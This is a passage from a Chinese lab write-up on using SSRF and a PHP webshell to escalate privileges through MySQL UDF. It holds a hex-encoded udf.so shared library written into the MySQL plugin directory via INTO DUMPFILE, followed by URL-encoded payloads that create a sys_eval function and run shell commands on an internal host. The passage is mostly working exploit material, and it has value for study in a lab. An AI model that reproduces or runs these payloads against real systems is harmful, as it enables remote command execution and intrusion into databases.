e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000%2520INTO%2520DUMPFILE%2520\"/usr/lib/mysql/plugin/udf.so\";"%2520-v%2520-c%2520>1.txt;ls%2520-lah;cat%25201.txt');
1
2
2
创建自定义RCE函数
# payload
url=http://192.168.100.28/1.php?1=system('python%2520exp.py%2520-t%2520192.168.100.29%2520-u%2520root%2520-p%2520""%2520-d%2520""%2520-P%2520"CREATE%2520FUNCTION%2520sys_eval%2520RETURNS%2520STRING%2520SONAME%2520\"udf.so\";"%2520-v%2520-c%2520>1.txt;ls%2520-lah;cat%25201.txt');
1
2
2
执行命令
# payload
url=http://192.168.100.28/1.php?1=system('python%2520exp.py%2520-t%2520192.168.100.29%2520-u%2520root%2520-p%2520""%2520-d%2520""%2520-P%2520"select%2520sys_eval(\"whoami;ls%2520/\")"%2520-v%2520-c%2520>1.txt;ls%2520-lah;cat%25201.txt');
1
2
2
参考:
- 手把手带你用 SSRF 打穿内网 (opens new window)
- 国光靶场ssrf打穿内网 (opens new window)
- Tomcat PUT方法任意写文件漏洞(CVE-2017-12615) (opens new window)
- java安全——jsp一句话木马 (opens new window)
- gopher协议的利用 (opens new window)
- 帮助生成gopher攻击mysql的payload (opens new window)
- SSRF利用 Gopher |Gopher攻击mysql及内网 (opens new window)
- MySQL UDF 提权十六进制查询 | 国光 (opens new window)
- linux环境下的MySQL UDF提权 (opens new window)
编辑 (opens new window)
最后一次更新于: 2025/04/16, 16:55:11